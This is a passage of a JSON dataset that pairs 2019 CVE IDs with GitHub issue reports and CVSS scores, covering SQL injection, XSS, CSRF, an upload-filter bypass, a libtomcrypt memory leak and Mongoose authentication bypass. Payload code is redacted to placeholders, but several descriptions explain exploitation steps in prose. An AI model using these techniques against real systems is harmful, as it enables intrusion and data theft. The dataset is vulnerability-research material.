  39684. "description": "There is a vulnerability which can bypass the APITAG function in APITAG ,so that I can upload any kind of files effectively. In APITAG , the upload function APITAG handles uploading files in this way NUMBERTAG handle the upload request and upload all of the files in the request without any safety precautions NUMBERTAG then judge the uploaded files and delete the dangerous files by the APITAG function. However, if I can create an exception that happens after the upload and before the APITAG function , the dangerous files will be uploaded to the server successfully. So, I make a request like this FILETAG In my code , I just accept the file param like APITAG APITAG I send a request which has two params(\"file\" and APITAG , the code will upload the jsp file to the server and stop running before the APITAG function, since the code will catch an exception ERRORTAG Content disposition corrupt: Content Disposition: form data: APITAG . FILETAG",
  39685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39686. "severity": "HIGH",
  39687. "baseScore": 7.5,
  39688. "impactScore": 3.6,
  39689. "exploitabilityScore": 3.9
  39690. },
  39691. {
  39692. "CVE_ID": "CVE-2019-17357",
  39693. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3025",
  39694. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3025",
  39695. "Repo_new": "cacti/cacti",
  39696. "Issue_Created_At": "2019-10-12T19:46:24Z",
  39697. "description": "SQL Injection in FILETAG . Describe the bug As reported by Eldar Marcussen of APITAG there is a SQL injection vulnerability in Cacti's FILETAG . Expected behavior Cacti should not contain SQL vulnerabilities",
  39698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  39699. "severity": "MEDIUM",
  39700. "baseScore": 6.5,
  39701. "impactScore": 3.6,
  39702. "exploitabilityScore": 2.8
  39703. },
  39704. {
  39705. "CVE_ID": "CVE-2019-17358",
  39706. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3026",
  39707. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3026",
  39708. "Repo_new": "cacti/cacti",
  39709. "Issue_Created_At": "2019-10-12T19:52:09Z",
  39710. "description": "Unsafe deserialization in Cacti. Describe the bug As reported by Eldar Marcussen of APITAG Cacti's unserialization of form data does not properly validate the form input which can result in unsafe unserialization operations. Expected behavior Cacti should always check serialized data for expected formatting, or utilize JSON data within the form post to avoid the use of the APITAG function when dealing with untrusted data.",
  39711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  39712. "severity": "HIGH",
  39713. "baseScore": 8.1,
  39714. "impactScore": 5.2,
  39715. "exploitabilityScore": 2.8
  39716. },
  39717. {
  39718. "CVE_ID": "CVE-2019-17362",
  39719. "Issue_Url_old": "https://github.com/libtom/libtomcrypt/issues/507",
  39720. "Issue_Url_new": "https://github.com/libtom/libtomcrypt/issues/507",
  39721. "Repo_new": "libtom/libtomcrypt",
  39722. "Issue_Created_At": "2019-10-03T17:45:17Z",
  39723. "description": "Vulnerability in der_decode_utf8_string. Description The APITAG function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF NUMBERTAG sequences. This allows context dependent attackers to cause a denial of service (out of bounds read and crash) or read information from other memory locations via carefully crafted DER encoded data. Attack vectors To exploit this vulnerability an attacker must be able to provide crafted DER encoded data to APITAG (e.g. by importing a NUMBERTAG certificate). Information disclosure is made possible by a NUMBERTAG steps attack where the imported data is later somehow re encoded and sent to the attacker (e.g. import and then export NUMBERTAG certificate). Details This vulnerability affects APITAG NUMBERTAG and earlier versions. For the remainder of this issue I will be referring to the code of APITAG last released version (i.e. version NUMBERTAG FILETAG The cause of the problem lies in the decoding loop at line NUMBERTAG of der_decode_utf8_string.c: CODETAG Here the variable tmp contains the value of the first byte of the utf NUMBERTAG encoded character. In accordance to FILETAG the number of most significant bits of tmp set at NUMBERTAG from left to right) prior to a NUMBERTAG indicates the number of bytes used to encode the utf NUMBERTAG character (i.e. a sequence starting by NUMBERTAG indicates a size of NUMBERTAG bytes) . However notice that NUMBERTAG is not a valid NUMBERTAG st byte. The loop in question fails to detect this case and process a sequence starting with NUMBERTAG as if it was a sequence of two bytes. A valid utf NUMBERTAG sequence of two bytes is of the form NUMBERTAG and can encode values up to NUMBERTAG FF. 
 Yet APITAG accepts sequences of two bytes of the form NUMBERTAG This invalid form offers an additional free bit and can therefore encode values up to APITAG hence including a range of values that would normally be encodable only using a sequence of at least NUMBERTAG bytes. This behavior can be used to trick APITAG into reporting a length bigger than the actual size of the encoded string. This works because the function APITAG returns a number of bytes based on the size of the decoded value. To see an example of how this can be exploited to crash the program or read data after the DER buffer, let us consider the function APITAG (used to decode NUMBERTAG certificates). When a utf NUMBERTAG entry is encountered this function will first decode it in an array pointed by APITAG and then compute the length using APITAG on the decoded data: ERRORTAG The computed len is later used to move forward some pointers: APITAG The variable inlen points to the size of the remaining number of bytes to decode. Using the aforementioned bug it is possible to craft an input such that APITAG . In this case APITAG will underflow resulting in a much bigger value than the actual size of the user's input. Finally, this can be used to crash the program (e.g. by reading an invalid memory location) or to trick the DER decoder into including adjacent data into the decoded sequence. APITAG In the following I include two proofs of concept. poc1 will likely cause a program to crash by triggering a read of NUMBERTAG ffffffff additional bytes (thus probably ending up in an invalid memory page). poc2 will add NUMBERTAG ffff bytes of adjacent memory to the decoded sequence. This data can then be accessed, in a NUMBERTAG steps attack scenario, by exporting the certificate. 
Notice that poc2 will very likely NOT cause the program to crash since any invalid DER type encountered after the leaked data will just cause the decoding to stop gracefully without causing any further error (line NUMBERTAG of der_decode_sequence_flexi.c). CODETAG CODETAG",
  39724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  39725. "severity": "CRITICAL",
  39726. "baseScore": 9.1,
  39727. "impactScore": 5.2,
  39728. "exploitabilityScore": 3.9
  39729. },
  39730. {
  39731. "CVE_ID": "CVE-2019-17371",
  39732. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/307",
  39733. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/307",
  39734. "Repo_new": "glennrp/libpng",
  39735. "Issue_Created_At": "2019-07-11T08:03:58Z",
  39736. "description": "memory leak in png_malloc_warn and png_create_info_struct. Hi,libpng team. there are memory leaks in the function APITAG and APITAG , respectively. I compiler gif2png to the NUMBERTAG bit LSB version with ASAN. The software runs in the NUMBERTAG Ubuntu NUMBERTAG services. the bug is trigered by APITAG . FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c NUMBERTAG c0d in png_malloc_warn ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c3e NUMBERTAG in png_create_info_struct ( PATHTAG NUMBERTAG d8 in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG a6d in APITAG ( PATHTAG ERRORTAG a6d NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG cc in APITAG ( PATHTAG ERRORTAG NUMBERTAG cc NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG NUMBERTAG process NUMBERTAG exited with code NUMBERTAG",
  39737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39738. "severity": "MEDIUM",
  39739. "baseScore": 6.5,
  39740. "impactScore": 3.6,
  39741. "exploitabilityScore": 2.8
  39742. },
  39743. {
  39744. "CVE_ID": "CVE-2019-17383",
  39745. "Issue_Url_old": "https://github.com/dspinhirne/netaddr-rb/issues/29",
  39746. "Issue_Url_new": "https://github.com/dspinhirne/netaddr-rb/issues/29",
  39747. "Repo_new": "dspinhirne/netaddr-rb",
  39748. "Issue_Created_At": "2022-04-21T09:19:14Z",
  39749. "description": "Release NUMBERTAG MENTIONTAG Would it be possible to release NUMBERTAG to APITAG As far as we understand it, it fixes URLTAG",
  39750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39751. "severity": "CRITICAL",
  39752. "baseScore": 9.8,
  39753. "impactScore": 5.9,
  39754. "exploitabilityScore": 3.9
  39755. },
  39756. {
  39757. "CVE_ID": "CVE-2019-17401",
  39758. "Issue_Url_old": "https://github.com/libyal/liblnk/issues/40",
  39759. "Issue_Url_new": "https://github.com/libyal/liblnk/issues/40",
  39760. "Repo_new": "libyal/liblnk",
  39761. "Issue_Created_At": "2019-10-07T18:06:02Z",
  39762. "description": "Heap Buffer Overflow in lnkinfo. We found a Heap Buffer Overflow in the lnkinfo binary; lnkinfo is compiled with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit : c NUMBERTAG bb7 lnkinfo NUMBERTAG Command : lnkinfo v POC POC : FILETAG ASAN Output ERRORTAG",
  39763. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39764. "severity": "LOW",
  39765. "baseScore": 3.3,
  39766. "impactScore": 1.4,
  39767. "exploitabilityScore": 1.8
  39768. },
  39769. {
  39770. "CVE_ID": "CVE-2019-17402",
  39771. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1019",
  39772. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1019",
  39773. "Repo_new": "exiv2/exiv2",
  39774. "Issue_Created_At": "2019-10-06T09:21:25Z",
  39775. "description": "Overflow in exi NUMBERTAG We found a vulnerability in the exi NUMBERTAG binary; exi NUMBERTAG is compiled with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
  39776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39777. "severity": "MEDIUM",
  39778. "baseScore": 6.5,
  39779. "impactScore": 3.6,
  39780. "exploitabilityScore": 2.8
  39781. },
  39782. {
  39783. "CVE_ID": "CVE-2019-17417",
  39784. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/2",
  39785. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/2",
  39786. "Repo_new": "lolipop1234/xxd",
  39787. "Issue_Created_At": "2019-10-08T02:12:20Z",
  39788. "description": "Pbootcms background storage XSS.",
  39789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39790. "severity": "MEDIUM",
  39791. "baseScore": 4.8,
  39792. "impactScore": 2.7,
  39793. "exploitabilityScore": 1.7
  39794. },
  39795. {
  39796. "CVE_ID": "CVE-2019-17418",
  39797. "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/2",
  39798. "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/2",
  39799. "Repo_new": "evi1code/Just-for-fun",
  39800. "Issue_Created_At": "2019-10-09T05:34:13Z",
  39801. "description": "Metinfo NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ERRORTAG $no PATHTAG Incoming by user, and Unfiltered. And success function return the information. payload ERRORTAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ulnerability code ERRORTAG doget_admin_pack function was called in APITAG function, and the two variables of $appno and $site passed by the user were not filtered. payload CODETAG",
  39802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39803. "severity": "HIGH",
  39804. "baseScore": 7.2,
  39805. "impactScore": 5.9,
  39806. "exploitabilityScore": 1.2
  39807. },
  39808. {
  39809. "CVE_ID": "CVE-2019-17419",
  39810. "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/1",
  39811. "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/1",
  39812. "Repo_new": "evi1code/Just-for-fun",
  39813. "Issue_Created_At": "2019-10-08T15:57:39Z",
  39814. "description": "Metinfo NUMBERTAG SQL Blind Injection. Vulnerability Name: Metinfo NUMBERTAG CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG payload CODETAG Vulnerability code ERRORTAG $id Incoming by user, and Unfiltered. GET payload: APITAG",
  39815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39816. "severity": "HIGH",
  39817. "baseScore": 7.2,
  39818. "impactScore": 5.9,
  39819. "exploitabilityScore": 1.2
  39820. },
  39821. {
  39822. "CVE_ID": "CVE-2019-17426",
  39823. "Issue_Url_old": "https://github.com/Automattic/mongoose/issues/8222",
  39824. "Issue_Url_new": "https://github.com/automattic/mongoose/issues/8222",
  39825. "Repo_new": "automattic/mongoose",
  39826. "Issue_Created_At": "2019-10-07T17:38:20Z",
  39827. "description": "Mongoose query . Do you want to request a feature or report a bug ? Vulnerability What is the current behavior? With this vulnerability, an attacker might steal sensitive data/bypass authentication in nodejs applications that use mongoose as front end. When injecting \"_bsontype\" attribute to a query object (e.g., id in find(id)), Mongoose will directly ignore the query object. This can be abused since most nodejs applications treat user input as an object. For example, an attacker can force the query filter condition to be null by adding another attribute (_bsontype) to the user input data. By doing this, an attacker can log into other users' accounts or bypass the token verification logic during password reset NUMBERTAG Even though Mongoose checks the query object according to the schema when querying in the form of APITAG the vulnerability can still be exploited if developers do queries like APITAG Similar issues are also found in MongoDB, and we have reported it. However, just to be safe, my suggestion is that mongoose should also filter _bsontype before invoking mongodb since _bsontype is an internal attribute used by mongodb NUMBERTAG URLTAG If the current behavior is a bug, please provide the steps to reproduce. Proof of Concept ERRORTAG What are the versions of FILETAG , Mongoose and APITAG you are using? Note that \"latest\" is not a version. Mongoose NUMBERTAG",
  39828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  39829. "severity": "CRITICAL",
  39830. "baseScore": 9.1,
  39831. "impactScore": 5.2,
  39832. "exploitabilityScore": 3.9
  39833. },
  39834. {
  39835. "CVE_ID": "CVE-2019-17429",
  39836. "Issue_Url_old": "https://github.com/Adhouma/cms/issues/1",
  39837. "Issue_Url_new": "https://github.com/adhouma/cms/issues/1",
  39838. "Repo_new": "Adhouma/cms",
  39839. "Issue_Created_At": "2019-10-10T02:57:45Z",
  39840. "description": "There is SQL injection in your source code. In the FILETAG file, you get the p_id parameter by GET, and then call the SQL query statement directly by passing the parameter without any filtering. This results in SQL injection. Use sqlmap FILETAG FILETAG",
  39841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39842. "severity": "CRITICAL",
  39843. "baseScore": 9.8,
  39844. "impactScore": 5.9,
  39845. "exploitabilityScore": 3.9
  39846. },
  39847. {
  39848. "CVE_ID": "CVE-2019-17430",
  39849. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/1",
  39850. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/1",
  39851. "Repo_new": "weng-xianhu/eyoucms",
  39852. "Issue_Created_At": "2019-06-21T10:32:09Z",
  39853. "description": "Reflected XSS vulnerabilities exist in the website. Cross Site Script Users often click on links when browsing websites, using instant messaging software, or even reading e mail. Attackers can steal user information by inserting malicious code into links. After the administrator has logged in, open the following page url: FILETAG poc: in web_recordnum",
  39854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39855. "severity": "MEDIUM",
  39856. "baseScore": 6.1,
  39857. "impactScore": 2.7,
  39858. "exploitabilityScore": 2.8
  39859. },
  39860. {
  39861. "CVE_ID": "CVE-2019-17433",
  39862. "Issue_Url_old": "https://github.com/z-song/laravel-admin/issues/3847",
  39863. "Issue_Url_new": "https://github.com/z-song/laravel-admin/issues/3847",
  39864. "Repo_new": "z-song/laravel-admin",
  39865. "Issue_Created_At": "2019-08-27T16:09:59Z",
  39866. "description": "a security issue. laravel admin background XSS first.add xss Roles FILETAG next go to operation log page FILETAG The following is my system environment FILETAG And I think this issue also exists in other APITAG don't know this place.",
  39867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39868. "severity": "MEDIUM",
  39869. "baseScore": 4.8,
  39870. "impactScore": 2.7,
  39871. "exploitabilityScore": 1.7
  39872. },
  39873. {
  39874. "CVE_ID": "CVE-2019-17434",
  39875. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/304",
  39876. "Issue_Url_new": "https://github.com/lavalite/cms/issues/304",
  39877. "Repo_new": "lavalite/cms",
  39878. "Issue_Created_At": "2019-09-04T03:51:02Z",
  39879. "description": "Stored XSS. I found a Stored XSS; a client user can use this vulnerability to attack the administrator APITAG use js to send a post request, indirectly operate the administrator account\uff0ca serious threat to website security\u3002 exploit client login site,and modify the account name to ERRORTAG now\uff0cif the super user logs in and looks APITAG trigger XSS\u3002 FILETAG Hackers can exploit this vulnerability to perform any action as the administrator",
  39880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39881. "severity": "MEDIUM",
  39882. "baseScore": 5.4,
  39883. "impactScore": 2.7,
  39884. "exploitabilityScore": 2.3
  39885. },
  39886. {
  39887. "CVE_ID": "CVE-2019-17452",
  39888. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/434",
  39889. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/434",
  39890. "Repo_new": "axiomatic-systems/bento4",
  39891. "Issue_Created_At": "2019-09-29T17:37:28Z",
  39892. "description": "SEGV in mp4dump. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4dump verbosity NUMBERTAG POC file ASAN Output ERRORTAG",
  39893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39894. "severity": "MEDIUM",
  39895. "baseScore": 6.5,
  39896. "impactScore": 3.6,
  39897. "exploitabilityScore": 2.8
  39898. },
  39899. {
  39900. "CVE_ID": "CVE-2019-17453",
  39901. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/436",
  39902. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/436",
  39903. "Repo_new": "axiomatic-systems/bento4",
  39904. "Issue_Created_At": "2019-09-30T07:47:11Z",
  39905. "description": "SEGV in mp4compact. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4compact POC /dev/null ASAN Output ERRORTAG",
  39906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39907. "severity": "MEDIUM",
  39908. "baseScore": 6.5,
  39909. "impactScore": 3.6,
  39910. "exploitabilityScore": 2.8
  39911. },
  39912. {
  39913. "CVE_ID": "CVE-2019-17453",
  39914. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/437",
  39915. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/437",
  39916. "Repo_new": "axiomatic-systems/bento4",
  39917. "Issue_Created_At": "2019-09-30T16:31:42Z",
  39918. "description": "SEGV in mp4encrypt. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 Encrypter Version NUMBERTAG APITAG Version NUMBERTAG Command mp4encrypt method OMA PDCF CBC show progress POC /dev/null ASAN Output ERRORTAG",
  39919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39920. "severity": "MEDIUM",
  39921. "baseScore": 6.5,
  39922. "impactScore": 3.6,
  39923. "exploitabilityScore": 2.8
  39924. },
  39925. {
  39926. "CVE_ID": "CVE-2019-17454",
  39927. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/435",
  39928. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/435",
  39929. "Repo_new": "axiomatic-systems/bento4",
  39930. "Issue_Created_At": "2019-09-29T20:00:36Z",
  39931. "description": "SEGV in mp4info. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4info show samples POC file ASAN Output ERRORTAG",
  39932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39933. "severity": "MEDIUM",
  39934. "baseScore": 6.5,
  39935. "impactScore": 3.6,
  39936. "exploitabilityScore": 2.8
  39937. },
  39938. {
  39939. "CVE_ID": "CVE-2019-17488",
  39940. "Issue_Url_old": "https://github.com/b3log/symphony/issues/970",
  39941. "Issue_Url_new": "https://github.com/b3log/symphony/issues/970",
  39942. "Repo_new": "b3log/symphony",
  39943. "Issue_Created_At": "2019-10-05T14:43:47Z",
  39944. "description": "\u4fee\u6539\u5e16\u5b50\u65f6\u6709xss\u6f0f\u6d1e, APITAG \u6839\u636e\u6b64\u9879\u76ee\u62a5\u544a\u5b89\u5168\u6f0f\u6d1e\u7684\u7b56\u7565. APITAG \u6211\u5df2\u5c06\u5177\u4f53\u6f0f\u6d1e\u8be6\u60c5\u53d1\u90ae\u4ef6\u81f3\u4f60\u7684\u90ae\u7bb1 EMAILTAG rg \u6ce8\u610f\u67e5\u6536.",
  39945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39946. "severity": "MEDIUM",
  39947. "baseScore": 6.1,
  39948. "impactScore": 2.7,
  39949. "exploitabilityScore": 2.8
  39950. },
  39951. {
  39952. "CVE_ID": "CVE-2019-17489",
  39953. "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/51",
  39954. "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/51",
  39955. "Repo_new": "shi-yang/jnoj",
  39956. "Issue_Created_At": "2019-10-06T16:13:29Z",
  39957. "description": "NUMBERTAG APITAG NUMBERTAG ERRORTAG \u53d1\u4e00\u4e2aHTTP\u8bf7\u6c42\u5185\u5bb9\u5982\u4e0b: ERRORTAG \u8bf7\u6c42\u6210\u529f\u540e\u8bbf\u95eeurl APITAG NUMBERTAG ss\u6f0f\u6d1e Payload CODETAG \u67e5\u770b\u95ee\u9898\u6807\u9898\u5217\u8868\u5373\u53ef\u89e6\u53d1. APITAG NUMBERTAG ss\u4ee3\u7801 APITAG Payload ERRORTAG NUMBERTAG ss\u4ee3\u7801. APITAG NUMBERTAG APITAG APITAG PHP\u540e\u7aef\u5904\u7406\u5bf9hint\u53c2\u6570\u7684\u8fc7\u6ee4\u89c4\u5219\u5982\u4e0b APITAG APITAG APITAG APITAG \u6211\u770b\u4e86\u4e0b\u540e\u53f0\u7ba1\u7406\u4e5f\u6709\u51e0\u5904XSS NUMBERTAG HTTP\u8bf7\u6c42\u5982\u4e0b CODETAG \u89e6\u53d1\u9875\u9762 APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  39958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39959. "severity": "MEDIUM",
  39960. "baseScore": 6.1,
  39961. "impactScore": 2.7,
  39962. "exploitabilityScore": 2.8
  39963. },
  39964. {
  39965. "CVE_ID": "CVE-2019-17494",
  39966. "Issue_Url_old": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
  39967. "Issue_Url_new": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
  39968. "Repo_new": "baijunyao/laravel-bjyblog",
  39969. "Issue_Created_At": "2019-10-07T13:51:50Z",
  39970. "description": "\u7533\u8bf7\u53cb\u94fe\u5b58\u5728xss\u6f0f\u6d1e. \u5728\u524d\u53f0\u7533\u8bf7\u53cb\u94fe\u7684\u65f6\u5019\u5728url\u5730\u5740\u8f93\u5165 APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG \u6ca1\u6709\u5224\u65ad\u5b57\u7b26\u4e32\u5728http\u7684\u4f4d\u7f6e, APITAG \u90a3\u8fd9\u6837\u5c31\u7ed5\u8fc7\u4e86,\u5e94\u8be5\u5224\u65adhttp\u8981\u5728\u5b57\u7b26\u4e32\u5f00\u59cb\u4f4d\u7f6e\u51fa\u73b0.",
  39971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39972. "severity": "MEDIUM",
  39973. "baseScore": 6.1,
  39974. "impactScore": 2.7,
  39975. "exploitabilityScore": 2.8
  39976. },
  39977. {
  39978. "CVE_ID": "CVE-2019-17521",
  39979. "Issue_Url_old": "https://github.com/Elias-Black/Landing-CMS/issues/8",
  39980. "Issue_Url_new": "https://github.com/elias-black/landing-cms/issues/8",
  39981. "Repo_new": "elias-black/landing-cms",
  39982. "Issue_Created_At": "2019-09-10T07:45:27Z",
  39983. "description": "Landing CMS has Cross site request forgery.. URLTAG I can change the admin's password when the admin clicks the csrf html file. payload: CODETAG FILETAG",
  39984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  39985. "severity": "MEDIUM",
  39986. "baseScore": 6.5,
  39987. "impactScore": 3.6,
  39988. "exploitabilityScore": 2.8
  39989. },
  39990. {
  39991. "CVE_ID": "CVE-2019-17522",
  39992. "Issue_Url_old": "https://github.com/HotaruCMS/HotaruCMS/issues/101",
  39993. "Issue_Url_new": "https://github.com/hotarucms/hotarucms/issues/101",
  39994. "Repo_new": "hotarucms/hotarucms",
  39995. "Issue_Created_At": "2019-09-26T09:21:57Z",
  39996. "description": "APITAG NUMBERTAG has a Stored Cross Site Scripting in SITE NAME.. FILETAG FILETAG FILETAG",
  39997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39998. "severity": "MEDIUM",
  39999. "baseScore": 4.8,
  40000. "impactScore": 2.7,
  40001. "exploitabilityScore": 1.7
  40002. },
  40003. {
  40004. "CVE_ID": "CVE-2019-17528",
  40005. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/432",
  40006. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/432",
  40007. "Repo_new": "axiomatic-systems/bento4",
  40008. "Issue_Created_At": "2019-09-23T02:21:12Z",
  40009. "description": "SEGV_UNKNOW was discovered in APITAG in APITAG . bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in bento NUMBERTAG There is a/an SEGV_UNKNOW in function APITAG at APITAG NUMBERTAG commandline mp4edit APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4edit NUMBERTAG crash name pwd bento4 mp4edit NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40011. "severity": "HIGH",
  40012. "baseScore": 7.5,
  40013. "impactScore": 3.6,
  40014. "exploitabilityScore": 3.9
  40015. },
  40016. {
  40017. "CVE_ID": "CVE-2019-17529",
  40018. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/430",
  40019. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/430",
  40020. "Repo_new": "axiomatic-systems/bento4",
  40021. "Issue_Created_At": "2019-09-23T02:16:44Z",
  40022. "description": "A heap buffer overflow was discovered in APITAG in APITAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40023. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40024. "severity": "HIGH",
  40025. "baseScore": 7.8,
  40026. "impactScore": 5.9,
  40027. "exploitabilityScore": 1.8
  40028. },
  40029. {
  40030. "CVE_ID": "CVE-2019-17530",
  40031. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/431",
  40032. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/431",
  40033. "Repo_new": "axiomatic-systems/bento4",
  40034. "Issue_Created_At": "2019-09-23T02:19:02Z",
